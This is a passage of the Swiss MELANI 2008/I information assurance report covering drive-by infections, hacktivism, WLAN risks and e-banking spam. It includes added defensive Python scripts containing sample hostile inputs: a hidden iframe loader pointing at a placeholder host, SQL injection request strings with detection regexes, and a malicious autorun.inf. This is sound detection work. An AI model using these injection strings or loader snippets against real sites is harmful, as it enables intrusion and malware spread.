Situation in Switzerland and Internationally

					                                           Federal Strategy Unit for IT FSUIT
                                           Federal Office of Police fedpol
                                           Reporting and Analysis Centre for Information Assurance MELANI
                                           www.melani.admin.ch




Information Assurance

Situation in Switzerland and Internationally
Semi-annual report 2008/I (January – June)




                                     In collaboration with:
Information Assurance – Situation in Switzerland and Internationally




Contents
1       Introduction .....................................................................................................................5
2       Current Situation, Threats and Risks............................................................................6
        2.1        From IT Security to Information Assurance............................................................6
        2.2        Mass Hacking of Legitimate Websites ...................................................................7
        2.3        Politically Motivated Hacking..................................................................................8
3       Trends / General Developments ....................................................................................9
        3.1        Open Wireless Networks as a Security Risk ..........................................................9
        3.2        Social Networks and the Threat of Data Abuse ...................................................10
        3.3        Commodity Malware and Commodity Hacking ....................................................10
4       Current National ICT Infrastructure Situation ............................................................12
        4.1        Breakdowns .........................................................................................................12
                   Confidential Schengen Data Published on FDJP Website...................................12
        4.2        Attacks .................................................................................................................12
                   Regular Spam E-Mails Target E-Banking Applications........................................12
                   Possible Attack Against forza-eveline.ch .............................................................14
        4.3        Crime....................................................................................................................14
                   Websites Misused for Drive-By Infections............................................................14
        4.4        Miscellaneous ......................................................................................................15
                   EURO 2008 Only a Limited Target for Cybercriminals ........................................15
                   Temporary Blocking of wikileaks.org....................................................................16
5       Current International ICT Situation .............................................................................17
        5.1        Breakdowns .........................................................................................................17
                   Damaged Undersea Internet Cables Interfere with Internet.................................17
                   Imprudent Approach to Sensitive Data ................................................................18
        5.2        Attacks .................................................................................................................18
                   Politically Motivated Hacking: Lithuania and Radio Free Europe Targeted .........18
                   ICANN and IANA Domains Hacked .....................................................................19
6       Prevention .....................................................................................................................19
        6.1        Focus: Wireless Networks....................................................................................19
7       Activities / Information .................................................................................................23
        7.1        State.....................................................................................................................23
                   Germany: Debate on Online Searches Continues ...............................................23
                   France: Arming for the Fight against Cyberattacks ..............................................24
                   Sweden: Controversial Surveillance Act Adopted by Parliament.........................24
                   NATO: Excellence Centre for Cyber Defence Established in Estonia .................24
                   EU: Extension of European Network and Information Security Agency, ENISA ..25
        7.2        Private Sector.......................................................................................................25
                   Improved Security Measures for E-Banking.........................................................25
                   WLAN in SBB First Class Carriages ....................................................................26
                   ICANN: Creation of New Top Level Domains ......................................................26


                                                                                                                                                  2/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

8       Legal Foundations ........................................................................................................27
              Federal Council Rejects New Legislation to Combat Network Crime ..................27
9       Glossary ........................................................................................................................28
10      Appendix .......................................................................................................................32
        10.1 Professionalization of Internet Crime: The Example of ZeuS ..............................32
        10.2 Drive-by Infections: What They Are and How They Work ....................................41









                                     Focus areas of issue 2008/I


  •     From IT Security to Information Assurance
        Current targeted IT attacks cannot always be successfully defended against even with
        the help of technical security measures and good common sense. Refocusing is
        therefore necessary, moving the protection of information to centre field and not only
        taking account of the protection of computers and networks.
        ► Current situation: Chapter 2.1
        ► Incidents in Switzerland: Chapter 4 and international incidents: Chapter 5.1

  •     Mass Hacking of Legitimate Websites
        The danger of drive-by infections via websites is growing rapidly. Since January 2008,
        several mass hacks of websites have been observed with the intent of infecting users.
        These include websites with an excellent reputation and high visitor numbers.
        ► Current situation: Chapter 2.2
        ► Incidents in Switzerland: Chapter 4
        ► Appendix: Chapter 10.2

  •     Politically Motivated Hacking
        Cyberattacks can be an important way to gain attention for a political concern. In
        addition to financial motives, political motives are increasingly becoming a focus of
        Internet crime. Recent developments have contributed to a public discussion of
        politically motivated hacking, so-called "hacktivism".
        ► Current situation: Chapter 2.3
        ► International incidents: Chapter 5.2
        ► State activities: Chapter 7.1

  •     Open Wireless Networks as a Security Risk
        Wireless networks (WLANs) have also become widespread among private individuals.
        If these networks are insufficiently secure, criminals may use them to access data and
        to conceal their true identity when committing IT crimes. Such abuses are
        unfortunately becoming more and more frequent. Following certain basic rules can
        help keep one's network clean.
        ► Trends for the next half-year: Chapter 3.1
        ► Prevention: Chapter 6

  •     Social Networks and the Threat of Data Abuse
        Social networks are popular since they offer the possibility of presenting oneself on the
        Internet with relatively little effort. The publication of personal data on the Internet
        poses a danger, however: it helps cybercriminals launch targeted attacks.
        ► Trends for the next half-year: Chapter 3.2








1 Introduction
The seventh semi-annual report (January – June 2008) of the Reporting and Analysis Centre
for Information Assurance (MELANI) presents the most significant trends involving the
threats and risks arising from information and communication technologies (ICT). It provides
an overview of the events in Switzerland and abroad, illuminates the most important
developments in the field of prevention, and summarizes the activities of public and private
actors. Explanations of jargon and technical terms (in italics) can be found in a glossary at
the end of this report. Comments by MELANI are indicated by a shaded box.

Chapter 2 describes the current situation, threats, and risks of the last half-year. Chapter 3
provides an outlook on the expected developments.

Chapters 4 and 5 discuss breakdowns and failures, attacks, crime and terrorism connected
with ICT infrastructures. Selected examples are used to illustrate important events of the first
six months of 2008. The reader will find illustrative examples and details supplementing the
more general information contained in Chapters 2 and 3.

Chapter 6 discusses a topic in the field of prevention that is closely related to the threats
covered in Chapter 3.

Chapter 7 focuses on public and private sector activities relating to information assurance in
Switzerland and abroad.

Chapter 8 summarizes changes to the legal foundations.

Chapter 9 contains a glossary with the most important terms used in this report.

Chapter 10 is an appendix with expanded technical explanations and instructions on
selected topics covered in the semi-annual report.









2 Current Situation, Threats and Risks

2.1 From IT Security to Information Assurance
The Swiss Reporting and Analysis Centre for Information Assurance (MELANI) began its
work about 4 years ago. Like most others, MELANI from the outset advocated the classic
technical protective measures such as anti-virus software, regular updates of programmes
and operating systems, the use of firewalls and the need for backups. These ABCs of the most
important protective measures for computers – whether in a private household or a business
environment – are still valid and should be complied with under all circumstances. However,
they are no longer sufficient today.

When driving a car, seatbelts, the proper speed, and compliance with traffic rules are
considered prerequisites for safe driving, yet these security measures cannot always prevent
an accident. The same is true today in the world of bits and bytes. While the vast majority of
attacks on computers and networks could still be prevented today with technical security
measures and a bit of common sense, the world of information and communications
technology – like the world of driving – must finally say goodbye to the idea of "absolute
security". In the latest, very widely disseminated e-mail waves (see Chapter 4.2), the time
passing between sending of the messages and recognition of the malware by the first virus
scanners was between six and twelve hours – enough time to infect almost all potential
victims. In the case of targeted attacks via e-mail, in which several hundred recipients are
addressed, recognition should no longer be expected within hours without an emergency
patch from the anti-virus manufacturer – if the attack is recognized at all. Modern malware is
conceived so that it can hide as long as possible from anti-virus software.

In addition to the limits of technical security measures, the sometimes careless and even
naive handling of information and data inside the IT security perimeter is an additional
problem. Any firewall is useless if data within a company are openly on display or can be
found with ease. Technical protective measures can do even less if CD-ROMs containing
several million bank account datasets, tax statements and the like are simply lost in the
internal mail. Technical protective measures are also powerless against the careless
placement of personal information on the Internet, including social networks (see Chapter
3.2).

For these reasons, a further interplay of different factors will be observed in the near future:
First, the fact that classic IT security measures now only provide conditional protection will
force a rethinking in the overarching field of information assurance. Second, the sometimes
careless handling of personal, confidential, or business information will continue to constitute
a risk in the event of an attack: whether in the preparation of an attack, or whether facilitating
the attacker's search for and access to data once the technical protective barriers have been
successfully breached.

This development calls for a rethinking: The focus must now be on the protection of
information instead of exclusively protection of the computers and networks on which the
information is stored. This will require stronger information and data management,
information classification and the like. Moreover, a clear balancing of risks is required,
entailing that the security of distribution channels, access privileges, and storage locations
must be adjusted to the actual value of the information. Not every channel or storage location
is equally secure, and not all documents in a business are equally sensitive. In this way,
information assurance is integrated into the business and strategic risk management
processes.



Such an approach can only be successful, however, if information assurance really becomes
an integral component of the security concept and is therefore situated at the same level as,
for instance, building and personal security, financial controlling, and so on.




2.2 Mass Hacking of Legitimate Websites
The danger of drive-by infections via websites is growing rapidly. Since January 2008,
several mass hacks of websites have been observed with the intent of infecting users. 1
These include websites with an excellent reputation and high visitor numbers. Even sites of
government organizations such as the United Nations (un.org) have been affected.

In the first half of 2008, MELANI also received an increasing number of reports of websites
that were hacked in order to place a drive-by infection (see Chapter 4.3). The injected scripts
open hidden IFrames that load exploits and infect the users' computers with malware – without
any user interaction, by exploiting vulnerabilities in the web browser. If these attempts do
not succeed, the visitor is then lured into installing a programme or plug-in. This likewise
infects the computer with malicious software, usually a Trojan downloader, which can
subsequently download additional malicious code.

In June 2008, a large number of Swiss websites were hacked and infected with malicious
JavaScript. The insidious aspect of this attack was that normal access to the site would not
trigger execution of the malicious code. If, however, the site was accessed via a search
engine such as Google or Yahoo, the malicious code was activated. The reason for this
concealment strategy is that website owners access their sites frequently, but as a rule
directly or via bookmarks. This contributes to keeping the infection undetected for as long as
possible.
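The cloaking described above can be checked for by a site operator without a browser: save the page once as fetched directly and once as fetched with a search-engine Referer header, then compare the elements that can load code. The Python script below, added here as an illustration and not part of the MELANI report, performs that comparison on two constructed HTML samples; the fetching itself is left to the operator, and the frame host injected-frame.invalid is a placeholder, not a real indicator.

```python
"""Added example: detect referrer-cloaked injections by diffing two copies of
the same page. Both inputs are constructed HTML strings, not captures."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# CSS that makes an element invisible: a loader the visitor is not meant to notice.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

# Tags that can pull in and execute foreign content.
ACTIVE_TAGS = {"iframe", "script", "object", "embed"}


class _ActiveElementCollector(HTMLParser):
    """Collects (tag, attributes) for every element that can load code."""

    def __init__(self):
        super().__init__()
        self.elements = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            # HTMLParser yields None for valueless attributes; normalise to "".
            self.elements.append((tag, {k: (v or "") for k, v in attrs}))


def active_elements(html):
    parser = _ActiveElementCollector()
    parser.feed(html)
    return parser.elements


def suspicion_reasons(tag, attrs, site_host):
    """Why an element that only shows up in the referred copy looks malicious."""
    reasons = []
    if HIDDEN_STYLE.search(attrs.get("style", "")):
        reasons.append("hidden via CSS")
    if tag == "iframe" and (attrs.get("width", "").strip() in {"0", "1"}
                            or attrs.get("height", "").strip() in {"0", "1"}):
        reasons.append("zero- or one-pixel frame")
    host = urlparse(attrs.get("src", "")).hostname
    if host and host != site_host:
        reasons.append("loads from external host " + host)
    return reasons


def find_cloaked_injections(direct_html, referred_html, site_host):
    """Return active elements present only when the page is reached via a
    search engine, each with the reasons it looks like a drive-by loader."""
    baseline = {(tag, tuple(sorted(attrs.items())))
                for tag, attrs in active_elements(direct_html)}
    findings = []
    for tag, attrs in active_elements(referred_html):
        if (tag, tuple(sorted(attrs.items()))) in baseline:
            continue
        findings.append({"tag": tag, "src": attrs.get("src", ""),
                         "reasons": suspicion_reasons(tag, attrs, site_host)})
    return findings


# Constructed sample: the page as the owner sees it (direct visit or bookmark).
DIRECT_HTML = """<html><body><h1>Welcome</h1>
<script src="/js/menu.js"></script></body></html>"""

# Constructed sample: the same page when the request carried a search-engine
# Referer. The injected frame host is a placeholder, not a real indicator.
REFERRED_HTML = """<html><body><h1>Welcome</h1>
<script src="/js/menu.js"></script>
<iframe src="http://injected-frame.invalid/in.php" width="0" height="0"
        style="display:none"></iframe></body></html>"""

if __name__ == "__main__":
    for f in find_cloaked_injections(DIRECT_HTML, REFERRED_HTML, "www.example.ch"):
        print(f["tag"], f["src"], "; ".join(f["reasons"]))
```

Because the comparison works on saved copies, the two fetches can be made with a non-rendering client (for instance urllib with a Referer header set) rather than with a browser, so the injected frame is never rendered on the operator's machine. Scheduling such a comparison against the site's own pages gives an early warning that direct visits and bookmark visits would never produce.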

The methods for injecting malicious code onto a website vary. Usually, the approach is to
exploit weaknesses in PHP applications, often by exploiting vulnerabilities in forums. Another
possibility is the use of SQL injections. In both cases, the websites are automatically tested
for common vulnerabilities. Website operators are thus advised to check their own
applications frequently for security risks and to modify them where necessary. 2 Additionally,
FTP credentials for websites are being harvested on a large scale, for instance by malicious
software (a keylogger) installed on the computer from which the website is administered.
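The automated probing described above leaves traces in the web server's access log, which is where an operator can notice it before an injection succeeds. The following Python snippet, added here and not taken from the report, classifies requests by two of the signatures the text mentions (SQL injection attempts and forum or admin paths) and lists the source addresses that probe repeatedly. The log lines are constructed, the signature list is deliberately small, and the threshold of three flagged requests is an assumption to tune per site.

```python
"""Added example: flag hosts probing a web server for the weaknesses the report
names (SQL injection, forum/admin paths). Sample log lines are constructed."""
import re
from collections import defaultdict

# Apache/nginx "combined"-style access log line; the request line is split out.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+')

# A space as it appears inside a URL (literal, '+', or percent-encoded).
SP = r"(?:\+|%20|\s)"

# Signatures of automated vulnerability probing seen in the request path.
PROBE_PATTERNS = {
    "sqli": re.compile(
        r"union" + SP + r"+select|information_schema|%27|'|"
        + SP + r"or" + SP + r"+\d+\s*=", re.I),
    "forum_admin_path": re.compile(r"/(?:phpbb|vbulletin|forum|admin)/", re.I),
}


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Names of every probe signature that matches the request path."""
    return [name for name, rx in PROBE_PATTERNS.items() if rx.search(path)]


def summarize(lines):
    """Per source IP: number of flagged requests, hits per signature, and the
    HTTP status codes those requests received (500s hint at a reachable bug)."""
    report = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kinds = classify(rec["path"])
        if not kinds:
            continue
        entry = report.setdefault(rec["ip"], {"flagged": 0,
                                              "kinds": defaultdict(int),
                                              "statuses": defaultdict(int)})
        entry["flagged"] += 1
        for kind in kinds:
            entry["kinds"][kind] += 1
        entry["statuses"][rec["status"]] += 1
    return report


def flag_scanners(report, threshold=3):
    """Source addresses with at least `threshold` flagged requests (assumed value)."""
    return sorted(ip for ip, entry in report.items() if entry["flagged"] >= threshold)


# Constructed sample log: one address sweeping a forum, one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2008:02:14:01 +0200] '
    '"GET /forum/viewtopic.php?t=12%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 312',
    '203.0.113.7 - - [10/Jun/2008:02:14:02 +0200] '
    '"GET /forum/profile.php?id=1%20or%201=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jun/2008:02:14:03 +0200] '
    '"GET /forum/admin/index.php HTTP/1.1" 404 210',
    '198.51.100.4 - - [10/Jun/2008:08:30:11 +0200] '
    '"GET /index.php?page=about HTTP/1.1" 200 4410',
    '198.51.100.4 - - [10/Jun/2008:08:30:15 +0200] '
    '"GET /images/logo.png HTTP/1.1" 200 8820',
]

if __name__ == "__main__":
    rep = summarize(SAMPLE_LOG)
    for ip in flag_scanners(rep):
        print(ip, dict(rep[ip]["kinds"]), dict(rep[ip]["statuses"]))
```

The "forum_admin_path" signature will also match an administrator's own visits, which is why the verdict rests on the count per address and the status codes rather than on a single match; a burst of 500 responses to malformed forum queries is the pattern worth alerting on.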

The advantage for criminals in distributing malicious code with the help of hacked websites is
obvious. When users receive unwanted e-mails nowadays, they are generally sceptical. But
if a large number of websites are hacked, the probability is high that some of the sites will
have a good reputation and a high number of visitors. Moreover, hackers try in a targeted
manner to attack websites with high visitor numbers. Limiting surfing to websites that are well
known or trustworthy therefore no longer offers protection. Many manufacturers of anti-virus
software try to counter the threat of drive-by infections by implementing additional protective
measures in their products. Restricting the use of JavaScript and ActiveX can also help
prevent unwanted drive-by downloads. 3

1 See e.g. http://www.heise.de/newsticker/Massenhacks-von-Webseiten-werden-zur-Plage--/meldung/105053 (as of: 11.08.2008) and http://www.heise.de/newsticker/Erneuter-Massenhack-von-Webseiten--/meldung/107786 (as of: 11.08.2008) and http://www.heise.de/security/Wieder-gross-angelegte-Angriffe-auf-Web-Anwender-im-Gange-Update--/news/meldung/101521 (as of: 11.08.2008).
2 For additional information, see: http://www.heise.de/security/Grandsicherung-fuer-PHP-Software--/artikel/96564 (as of: 11.08.2008).




2.3 Politically Motivated Hacking
For general Internet crime, financial enrichment continues to represent the most important
motivation. In addition, however, other motives are becoming more important and are
increasingly discussed in public. One of these motives is political, so-called "hacktivism". The
term "hacktivism" combines hacking with political or social activism and will be referred to
here also as "politically motivated hacking". Hacktivism is not a new phenomenon, but has
become more prevalent recently.

Hacktivism may be based on nationalistic motives or may constitute a kind of public protest
or civil disobedience. The Internet constitutes a public stage and makes it possible to gain
worldwide attention by relatively simple means. Moreover, the Internet and information
technologies play an increasingly important role in modern states, providing numerous
targets. Actors in a political conflict or any type of dispute can use the Internet and
information technologies both as a means and as a target. For these purposes, politically
motivated hackers use a wide range of illegal or at least dubious means. Often used are
website defacements as well as DDoS attacks, attacks against a server with the goal of
interfering with one or more of its services. Other commonly used means are redirects,
information theft, website parodies, virtual sit-ins, sabotage, and specially developed
software. 4

Hacktivism has already existed since the late 1990s. The politically motivated DDoS attacks
against Estonia in 2007 in connection with the dispute over the relocation of a Soviet war
memorial in the Estonian capital Tallinn have now put this phenomenon on the political
agenda of many countries, however. 5 In this case, it is assumed that the perpetrators were
Russian nationalists. The broad discussion of this case also contributed to NATO's decision
in May of this year to establish a centre of cyberdefence (see Chapter 7.1).

In 2008, smouldering conflicts between Russia and other republics of the former Soviet
Union have led to politically motivated hacking attacks. For instance, Lithuania and Georgia 6
were victims of cyberattacks, the source of which is likely to be found in their conflicts with
Russia. Another probably politically motivated DDoS attack was against US-supported Radio
Free Europe. (See Chapter 5.2 for the attacks against Lithuania and Radio Free Europe.) A
somewhat different example of politically motivated hacking took place during the primary
elections in the US. The Barack Obama website was manipulated in such a way that visitors
were redirected to the Hillary Clinton website. Sporting events such as the EURO 2008 are
also repeatedly used as an occasion for politically motivated hacking attacks. For instance,
Turkish nationalists were likely responsible for the defacement of the website of the Croatian
foreign ministry during the game between the two countries (see Chapter 4.4).

3 See MELANI semi-annual report 2007/2, Chapter 6: http://www.melani.admin.ch/dokumentation/00123/00124/01048/index.html?lang=en (as of: 15.08.08).
4 For additional information, see: http://www.alexandrasamuel.com/dissertation/index.html (as of: 15.08.08).
5 For the attack against Estonia, see MELANI semi-annual report 2007/1, Chapter 5.1: http://www.melani.admin.ch/dokumentation/00123/00124/01029/index.html?lang=en (as of: 15.08.08).
6 The conflict between Russia and Georgia was accompanied by violent cyberattacks since the end of July 2008, especially against Georgian government offices. Since these attacks took place in the second half of 2008, however, this report will not discuss them further.

Cyberattacks are a popular means for gaining attention for a political concern. First, these
means are relatively low-cost. Second, it is easily possible to erase tracks on the Internet,
thus making identification of the perpetrator more difficult. And third, the increasing
dependency of our modern society on IT resources entails that numerous attack vectors are
available and especially that such attacks can be carried out worldwide. It can therefore be
expected that political conflicts and disputes will increasingly be accompanied by hacking
attacks. It should be kept in mind, however, that while such operations may accompany
conflicts and wars, they are not suitable for directly supporting acts of war. Accordingly, the
frequent conflation of hacktivism and "cyberwar" is not accurate.




3 Trends / General Developments

3.1 Open Wireless Networks as a Security Risk
Wireless networks (WLANs) have also become widespread among private individuals.
Additionally, the trend is moving more and more clearly away from desktop computers
toward portable devices with built-in wireless network cards. The iPhone will also boost the
dynamics of wireless technology. Unfortunately, the misuse of wireless networks is also
steadily on the rise.

If a wireless connection is not sufficiently secure, it can be used to access both an existing
internal network as well as the Internet. The entire network traffic passing through this
wireless network can be recorded. If the internal network also lacks access restrictions for
folders, these can also be accessed without any difficulty. This is particularly problematic in
the case of business networks. A virtual break-in at a company can be very lucrative for an
attacker. The best-known example was the break-in into the TJX network in 2006. Insufficient
WLAN encryption in a business in Minnesota (United States) allowed 45.7 million client
accounts to be compromised. The hackers were able to crack the WEP-encrypted network
and gain access to the company's database. Especially problematic are wireless network
devices connected – without the knowledge of IT officers – to the company network, thereby
providing a point of attack for unknown hackers.

Poorly protected or open wireless networks also represent a further danger: When
committing a crime, criminals can conceal their IP address and their identity. People who fail
to protect their wireless network sufficiently can expect the network to be misused for
criminal acts. In Switzerland, several such cases have become known. These have included
extortions, sexual assault, and downloading of child pornography. Internet forums for these
purposes expressly recommend exploiting such vulnerabilities and using third-party wireless
networks. Although no criminal charges should be filed against the users of unsecured
wireless networks, they may nevertheless suffer unpleasant consequences. If an IP address
is discovered during criminal proceedings, this may lead to a house search. Everyone should
therefore think about security before making their Internet connection available to others:
What services should be provided? What sites should be allowed? Should access control be
used? However, there is so far no legal basis to require wireless network owners to identify
their users. For a detailed assessment of the legal situation in Switzerland, see Chapter 6.

When employing wireless networks, a certain degree of sensitivity with respect to security is
appropriate. Persons not wanting to make their networks available to others should protect
them sufficiently. If one wishes to make one's wireless network available to others, however,
then restrictions should be considered in advance. These restrictions relate to defining the
persons to be given access to the wireless network as well as the services to be provided.
Chapter 6 offers some tips in this regard.




3.2 Social Networks and the Threat of Data Abuse
Social networks offer the possibility of creating one's own profile with relatively little effort and
presenting oneself on the Internet. Their popularity lies in being able to make and cultivate
numerous contacts in an easy and uncomplicated manner. They also make it possible to find
long-lost school colleagues and to search for new jobs. The enthusiastic use of these sites,
especially the way in which many users publish their personal information, bears dangers,
however.

Social networking sites can serve cybercriminals as a welcome supplier of information. To
launch a professional and targeted social engineering attack, criminals conduct detailed
Internet research in advance. Social networking sites containing numerous and diverse
information, such as job position, e-mail address, business partners, hobbies, and the like,
constitute a particularly profitable source. Using such information, e-mails infected with
malware can be written more credibly. Phishing e-mails can also be formulated in a more
targeted manner. Especially for businesses, such targeted attacks are problematic. Users
should also be cautious when receiving invitations for additional networks. Invitations from
unknown persons may conceal criminals and spammers who are merely interested in
collecting personal data.

Social networks are often thought of as a sort of parallel world. Many users divulge personal
information on the Internet that they would keep for themselves in the "real" world. This
perceived "community" may however be deceiving. Users are often unaware that personal
information such as photos and films published on the Internet often stay on the Internet.
Personal information on the Internet can also be analyzed for targeted advertising and
marketing.

The use of social networking sites should be governed by the same principles as use of the
Internet in general. As little personal information as possible should be divulged. The
information should be well protected and only made accessible to clearly defined persons.
Ultimately, the responsibility lies with each individual Internet user. Prior to publication,
everyone should think and decide for themselves which personal data to publish on the
Internet, thereby making it available to the public for an indeterminate time period.




3.3 Commodity Malware and Commodity Hacking
Since late 2007, more and more cases have surfaced in which commodities that have basic
operating systems or storage space are sold to consumers in a vulnerable or infected state.
These devices range from USB sticks or disks, USB-connected digital picture frames, to
networked devices like routers and wireless routers. They are all sold as "common off-the-shelf"
(COTS) consumer products and are typically designed to be instantly used without
further software or hardware installations. Some are infected accidentally with viruses, others
manufactured with fraud in mind and misused by computer criminals as a new means to
spread malware. Such an approach is commonly termed "commodity hacking". 7

Two categories are distinguished: storage devices and network devices. What these two
categories have in common is an implicit trust by the consumer that these devices can be
“plugged and played” immediately without any need for security checks on their part. This
trust, however, can also make such devices an ideal medium for propagating malware.

Storage devices: Commodity storage devices are very broadly defined. On the one side they
include devices such as USB sticks and external hard drives, purchased specifically to hold
extra data. But also digital picture frames, telephones, and many other devices with flash
memory chips fall within this category. Many computers are configured in a way that
attaching such USB storage devices automatically opens folders or files. These actions
defined in autorun.inf may also be used to install malicious software.
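To make visible what an autorun.inf can make a computer do, the following Python example (added here, not from the report) parses the file from a freshly attached volume and reports every key that would launch a program, so that a device can be inspected from a machine with AutoPlay disabled before it is trusted. The two sample files are constructed; the "autorun.amd64"-style section handling and the three-request treatment of shell command keys reflect the documented INI layout of the file, and the file names in the examples are placeholders.

```python
"""Added example: audit an autorun.inf before a removable device is trusted.
The sample file contents are constructed, not taken from a real device."""
import configparser
from pathlib import Path

# Keys that make Windows start a program when the volume is attached or opened.
EXEC_KEYS = ("open", "shellexecute")


def audit_autorun(text):
    """Parse autorun.inf text; report what it would launch and a risk verdict."""
    # strict=False tolerates duplicate keys, interpolation=None keeps '%' literal,
    # and '=' is the only delimiter so drive letters with ':' stay intact.
    cp = configparser.ConfigParser(strict=False, interpolation=None,
                                   delimiters=("=",))
    result = {"label": None, "icon": None, "executes": [],
              "risky": False, "parse_error": None}
    try:
        cp.read_string(text)
    except configparser.Error as exc:
        # An unparsable autorun.inf on a new device is itself worth a closer look.
        result["parse_error"] = str(exc)
        result["risky"] = True
        return result
    for section in cp.sections():
        # [autorun] and architecture-specific variants such as [autorun.amd64]
        if not section.lower().startswith("autorun"):
            continue
        for key, value in cp.items(section):
            key = key.lower()   # configparser already lower-cases, made explicit
            if key == "label":
                result["label"] = value
            elif key == "icon":
                result["icon"] = value
            elif key in EXEC_KEYS or (key.startswith("shell\\")
                                      and key.endswith("\\command")):
                # open=, shellexecute= and shell\<verb>\command= all run a program
                result["executes"].append((key, value))
    result["risky"] = bool(result["executes"])
    return result


def missing_targets(executes, present):
    """Launch targets that are not among the file names present on the volume
    (a program referenced but absent, or hidden elsewhere, is a warning sign)."""
    targets = set()
    for _, value in executes:
        tokens = value.strip().strip('"').split()
        if tokens:
            targets.add(tokens[0].strip('"').lower())
    present_lower = {name.lower() for name in present}
    return sorted(t for t in targets if t not in present_lower)


def audit_volume(root):
    """Audit a mounted volume; returns None when it carries no autorun.inf."""
    root = Path(root)
    inf = root / "autorun.inf"
    if not inf.is_file():
        return None
    report = audit_autorun(inf.read_text(errors="replace"))
    present = {p.name for p in root.iterdir()}
    report["missing_targets"] = missing_targets(report["executes"], present)
    return report


# Constructed sample: a file that runs a program on attach, on double-click and
# on "Explore", while presenting itself as an ordinary picture frame.
SAMPLE_AUTORUN = """[autorun]
open=setup.exe
icon=setup.exe,0
label=Photo Frame
shell\\open\\command=setup.exe
shell\\explore\\command=setup.exe
"""

# Constructed sample: label and icon only, nothing is launched.
BENIGN_AUTORUN = """[autorun]
label=Backup
icon=disk.ico
"""

if __name__ == "__main__":
    for name, text in (("frame", SAMPLE_AUTORUN), ("backup", BENIGN_AUTORUN)):
        report = audit_autorun(text)
        print(name, "risky" if report["risky"] else "ok", report["executes"])
```

The audit only reads the file; it never follows the referenced program. Run on a mount point, audit_volume also lists launch targets that are not present at the root of the volume, which is a useful second signal when the device came in the box already carrying an autorun.inf.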

Network devices: The second category is network devices. These can range from internal
network devices like scanners or printers to gateway devices, routers, and wireless routers.
While the internal devices are available within a network, and are harder to attack from the
Internet, commodity gateway devices connect a home network to the Internet. When used in
medium to large enterprises these devices are maintained by professional firewall and router
specialists. Home users, in contrast, typically have to install and maintain their devices on
their own. Once installed, these devices are often left to run permanently, without being
monitored. This accessibility makes them attractive to attackers. A successful attack may
allow full access to the bandwidth that these devices control. Consumers should be aware
that these devices typically have working operating systems on them. The operating
systems are mass-produced and have standard default settings such as administrator
passwords, which are known to hackers. The misuse of default passwords has been a
known problem for some time.⁸

At the beginning of this year, Symantec identified the first cases of "drive-by pharming". With
this new type of malware attack, merely viewing a website with embedded malicious
code can cause manipulation of a home router so that entry of a specific URL redirects the
user to a bogus site.⁹ The attack method found does not even require the attacker to guess
an administrator's password.¹⁰

It must be expected that commodities will increasingly be attacked by criminals. There are
currently signs that commodities are evolving into a third attractive path for distributing
malware, in addition to infected spam e-mails and drive-by infections. Consumers will no
longer be able to rely completely on the manufacturer in this regard. With every purchase,
they should "prepare" their devices prior to use, for instance by having them checked by an
anti-virus scanner or by changing the default settings (passwords, etc.).




⁷ See http://www.securityfocus.com/news/11499 (as of: 08.07.2008).
⁸ See e.g.: http://www.indiana.edu/~phishing/papers/warkit.pdf and http://www.symantec.com/avcenter/reference/Driveby_Pharming.pdf (as of: 23.01.2008).
⁹ https://forums.symantec.com/syment/blog/article?message.uid=305989 (as of: 23.01.2008).
¹⁰ https://forums.symantec.com/syment/blog/article?blog.id=emerging&message.id=94&jump=true#M94 (as of: 23.01.2008).

4 Current National ICT Infrastructure Situation

4.1 Breakdowns

Confidential Schengen Data Published on FDJP Website

For three weeks, the website of the Federal Department of Justice and Police (FDJP)
inadvertently made a document with confidential data on the Schengen agreement available
to the public. The paper contained answers of the Swiss federal authorities to more than 200
questions on implementation of Schengen requirements. These included detailed information
on Switzerland's measures against gangs of dealers in stolen goods, drug and people
smugglers, security measures at airports, and Swiss access points to the Schengen
Information System (SIS).

In the assessment of the Ambassador of the EU Commission to Switzerland and
Liechtenstein, Michael Reiterer, the document has a "low level of confidentiality". The effects
in this case therefore appear to be minor. Nevertheless, this example shows that it is not
sufficient to protect data against improper access from the outside. It is equally important to
define appropriate guidelines specifying which persons have access to protected documents
and which persons may modify or publish them. For instance, it is not sensible to grant all
persons access to all documents. Person-specific access is preferable, and it should be
considered which document is necessary for the work of which person.




4.2 Attacks

Regular Spam E-Mails Target E-Banking Applications

In the first half of 2008, numerous spam waves were observed containing malware and
targeting e-banking applications. On 7 January 2008 and on 14 March 2008, for instance, an
unknown number of e-mails with the subject line "News on radioactive contamination in
Switzerland" were sent out. After clicking on the link contained in the message, the recipient
was asked to install a file containing a video of the accident. Actually, however, the file
contained malware.




On 27 March 2008, an unknown number of e-mails were sent out with the subject line: "A
Swiss banking crisis is unavoidable". After clicking on the link contained in the e-mail
message, the recipient was asked to install a "plug-in". Here again, the goal was to install
malware. This spam wave is notable in particular since its content referred to a current and
much-discussed topic at that time, namely the events relating to the mortgage crisis.

Later e-mails varied with respect to content and subject line. The more recent e-mails
contained attachments with executable files. These were usually compressed (zip, rar) to
conceal their extensions. For a full list of the spam waves, please refer to the MELANI
newsletter.¹¹

In the first half of 2008, MELANI observed several e-mail waves targeting e-banking
applications. Over some periods, these waves could be observed with weekly frequency. The
same type of malware was always used. However, the malware was modified so that it could
initially be identified by only a few anti-virus programmes or by none at all. The content of the
e-mails was intended to stimulate the curiosity or fear of the recipient. The linguistic quality of
the texts varied, but most were written in poor German. One striking sign was the lack of
umlauts. The content of the e-mails also contained errors. For instance, there are no Swiss
nuclear power plants in Geneva.

In general, it must be assumed that the topicality of a message, its thematic adjustment to
the recipients, and its linguistic quality are factors that may convince a recipient to click on a
link or to open an attachment. An increase in targeted spam waves should be expected in
the future.

In its newsletter, MELANI warns of these spam waves regularly and in detail. In general, it is
recommended to be cautious when receiving e-mails from unknown senders. In such cases,
